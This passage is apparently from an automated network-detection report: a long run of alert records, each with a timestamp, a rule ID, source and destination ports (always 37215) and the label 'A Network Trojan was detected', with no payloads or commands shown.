              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167349
              SID:2835222
              Source Port:43192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457136
              SID:2835222
              Source Port:39918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105476
              SID:2835222
              Source Port:60904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484623
              SID:2835222
              Source Port:42942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103300
              SID:2835222
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375093
              SID:2835222
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630633
              SID:2829579
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484603
              SID:2829579
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474627
              SID:2835222
              Source Port:33438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538209
              SID:2829579
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408004
              SID:2835222
              Source Port:59346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449082
              SID:2829579
              Source Port:54968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821763
              SID:2829579
              Source Port:37186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207088
              SID:2829579
              Source Port:46890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764891
              SID:2835222
              Source Port:49184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430515
              SID:2835222
              Source Port:49888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573324
              SID:2835222
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501497
              SID:2829579
              Source Port:41360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531860
              SID:2835222
              Source Port:34476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575149
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823052
              SID:2835222
              Source Port:42860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801649
              SID:2835222
              Source Port:60524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096781
              SID:2829579
              Source Port:52162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979508
              SID:2829579
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859586
              SID:2835222
              Source Port:40726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804495
              SID:2829579
              Source Port:60570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516294
              SID:2829579
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343676
              SID:2835222
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801723
              SID:2829579
              Source Port:56458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573235
              SID:2829579
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100633
              SID:2829579
              Source Port:52576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458421
              SID:2829579
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097767
              SID:2835222
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570638
              SID:2829579
              Source Port:57210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692509
              SID:2829579
              Source Port:43734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151153
              SID:2835222
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396547
              SID:2835222
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397735
              SID:2835222
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364343
              SID:2835222
              Source Port:54170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452833
              SID:2835222
              Source Port:35466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741690
              SID:2829579
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816094
              SID:2829579
              Source Port:51568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638287
              SID:2829579
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194453
              SID:2835222
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060875
              SID:2835222
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118692
              SID:2829579
              Source Port:57652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099838
              SID:2835222
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148466
              SID:2829579
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446423
              SID:2835222
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726788
              SID:2835222
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146981
              SID:2829579
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485140
              SID:2835222
              Source Port:47888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973801
              SID:2835222
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764000
              SID:2835222
              Source Port:59974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926084
              SID:2829579
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490970
              SID:2835222
              Source Port:45806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574589
              SID:2835222
              Source Port:37746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802259
              SID:2829579
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115294
              SID:2835222
              Source Port:41228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123460
              SID:2835222
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750079
              SID:2835222
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246490
              SID:2829579
              Source Port:36198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348062
              SID:2835222
              Source Port:37476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681297
              SID:2835222
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130124
              SID:2835222
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866449
              SID:2829579
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.993804
              SID:2835222
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233710
              SID:2835222
              Source Port:34254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254136
              SID:2835222
              Source Port:34896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538156
              SID:2829579
              Source Port:55520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308845
              SID:2829579
              Source Port:44750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662549
              SID:2829579
              Source Port:46724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040452
              SID:2835222
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422354
              SID:2835222
              Source Port:45678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458321
              SID:2829579
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282439
              SID:2835222
              Source Port:42708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451183
              SID:2835222
              Source Port:43478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582570
              SID:2829579
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637895
              SID:2835222
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128280
              SID:2829579
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725114
              SID:2829579
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285047
              SID:2829579
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689666
              SID:2829579
              Source Port:55460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284105
              SID:2829579
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374830
              SID:2835222
              Source Port:35394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432565
              SID:2829579
              Source Port:59836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204323
              SID:2829579
              Source Port:38924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287928
              SID:2829579
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424191
              SID:2835222
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079745
              SID:2829579
              Source Port:39162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661023
              SID:2835222
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394869
              SID:2835222
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249778
              SID:2835222
              Source Port:56546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2835222
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574102
              SID:2835222
              Source Port:58678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121312
              SID:2829579
              Source Port:39430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233935
              SID:2835222
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866216
              SID:2835222
              Source Port:60118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532318
              SID:2835222
              Source Port:43014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408002
              SID:2829579
              Source Port:48378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378121
              SID:2835222
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300000
              SID:2835222
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550632
              SID:2829579
              Source Port:55200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049520
              SID:2829579
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542204
              SID:2835222
              Source Port:39606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520111
              SID:2835222
              Source Port:56486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102298
              SID:2829579
              Source Port:57698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553313
              SID:2829579
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702271
              SID:2835222
              Source Port:41348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.459039
              SID:2835222
              Source Port:35854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505595
              SID:2829579
              Source Port:37142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550455
              SID:2829579
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545322
              SID:2835222
              Source Port:37042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538713
              SID:2835222
              Source Port:50676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445070
              SID:2829579
              Source Port:54192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799308
              SID:2829579
              Source Port:38452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769548
              SID:2829579
              Source Port:36584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882693
              SID:2829579
              Source Port:39694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550524
              SID:2835222
              Source Port:40486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153952
              SID:2829579
              Source Port:56554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575748
              SID:2835222
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157088
              SID:2829579
              Source Port:40430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504726
              SID:2829579
              Source Port:60234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427314
              SID:2829579
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332223
              SID:2829579
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517885
              SID:2829579
              Source Port:60990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165211
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637754
              SID:2835222
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343025
              SID:2829579
              Source Port:37242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053991
              SID:2835222
              Source Port:51636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504595
              SID:2835222
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119857
              SID:2835222
              Source Port:51630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166804
              SID:2835222
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634797
              SID:2829579
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923983
              SID:2829579
              Source Port:37002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395747
              SID:2829579
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231810
              SID:2829579
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053646
              SID:2835222
              Source Port:50956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362060
              SID:2835222
              Source Port:41726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622097
              SID:2835222
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664994
              SID:2835222
              Source Port:53744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157642
              SID:2835222
              Source Port:47418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747876
              SID:2835222
              Source Port:46218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749285
              SID:2829579
              Source Port:48210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280244
              SID:2829579
              Source Port:57324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284590
              SID:2835222
              Source Port:45502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122542
              SID:2835222
              Source Port:56764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608141
              SID:2829579
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103483
              SID:2829579
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111818
              SID:2829579
              Source Port:47288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390609
              SID:2835222
              Source Port:51636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861937
              SID:2835222
              Source Port:44240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534305
              SID:2835222
              Source Port:60128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456628
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860321
              SID:2829579
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242029
              SID:2829579
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279007
              SID:2829579
              Source Port:48130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975645
              SID:2829579
              Source Port:33420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245729
              SID:2829579
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251575
              SID:2835222
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575607
              SID:2829579
              Source Port:48696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882451
              SID:2835222
              Source Port:53296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232545
              SID:2835222
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703434
              SID:2835222
              Source Port:51664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2835222
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313780
              SID:2835222
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505871
              SID:2835222
              Source Port:54246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128113
              SID:2829579
              Source Port:55242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594805
              SID:2835222
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309171
              SID:2835222
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540637
              SID:2829579
              Source Port:36318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548570
              SID:2835222
              Source Port:34186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099748
              SID:2835222
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752034
              SID:2829579
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369035
              SID:2835222
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482343
              SID:2829579
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600056
              SID:2829579
              Source Port:45512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125521
              SID:2835222
              Source Port:51622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459649
              SID:2835222
              Source Port:36860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397756
              SID:2829579
              Source Port:34750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453564
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857766
              SID:2829579
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152625
              SID:2835222
              Source Port:50748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635980
              SID:2835222
              Source Port:45004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365372
              SID:2835222
              Source Port:53590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153988
              SID:2829579
              Source Port:35796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799356
              SID:2829579
              Source Port:41434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071021
              SID:2829579
              Source Port:42228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456897
              SID:2829579
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575574
              SID:2829579
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976745
              SID:2829579
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548551
              SID:2829579
              Source Port:37106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879251
              SID:2829579
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448707
              SID:2835222
              Source Port:58164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368407
              SID:2829579
              Source Port:41268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.410837
              SID:2835222
              Source Port:44770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365278
              SID:2835222
              Source Port:43700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
